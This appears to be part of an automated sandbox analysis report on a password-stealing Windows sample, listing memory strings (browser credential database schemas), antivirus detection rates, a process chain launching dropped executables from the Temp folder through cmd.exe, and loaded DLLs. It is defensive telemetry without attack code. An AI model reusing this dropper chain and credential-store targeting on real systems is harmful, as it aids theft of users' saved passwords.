                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1870480409.000000001CE9A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1883425451.000000006C6FF000.00000002.00000001.01000000.00000007.sdmp, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1882687782.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                        Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1870480409.000000001CE9A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1883425451.000000006C6FF000.00000002.00000001.01000000.00000007.sdmp, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1882687782.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1870480409.000000001CE9A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1883425451.000000006C6FF000.00000002.00000001.01000000.00000007.sdmp, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1882687782.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1870480409.000000001CE9A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1883425451.000000006C6FF000.00000002.00000001.01000000.00000007.sdmp, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1882687782.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                        Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                        Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                        Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                        Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                        Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1870480409.000000001CE9A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1883425451.000000006C6FF000.00000002.00000001.01000000.00000007.sdmp, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1882687782.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1870480409.000000001CE9A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1882687782.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1870480409.000000001CE9A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1883425451.000000006C6FF000.00000002.00000001.01000000.00000007.sdmp, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1882687782.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                        Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000003.1729775800.0000000022E14000.00000004.00000020.00020000.00000000.sdmp, CGIJKJJKEBGHJKFIDGCA.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1870480409.000000001CE9A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1882687782.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                        Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1870480409.000000001CE9A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1882687782.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                        Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeReversingLabs: Detection: 44%
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeVirustotal: Detection: 44%
                        Source: BGIIDAEBGC.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                        Source: explorti.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe"
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe"
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\ECGHCBGCBF.exe"
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe "C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe"
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeProcess created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe"
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess created: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe "C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe"
                        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\ECGHCBGCBF.exe"Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe "C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeProcess created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess created: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe "C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe" Jump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeSection loaded: shfolder.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeSection loaded: rstrtmgr.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeSection loaded: mozglue.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeSection loaded: wsock32.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeSection loaded: vcruntime140.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeSection loaded: msvcp140.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeSection loaded: pcacli.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeSection loaded: sfc_os.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dui70.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: duser.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dwrite.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.ui.immersive.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bcp47mrm.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uianimation.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dxgi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: resourcepolicyclient.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: d3d11.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: d3d10warp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dxcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dcomp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dwmapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: textinputframework.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: coreuicomponents.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: textshaping.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeSection loaded: mstask.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeSection loaded: dui70.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeSection loaded: duser.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeSection loaded: chartv.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeSection loaded: oleacc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeSection loaded: atlthunk.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeSection loaded: textinputframework.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeSection loaded: coreuicomponents.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeSection loaded: wtsapi32.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeSection loaded: winsta.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeSection loaded: textshaping.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeSection loaded: explorerframe.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exeSection loaded: shfolder.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exeSection loaded: uxtheme.dllJump to behavior
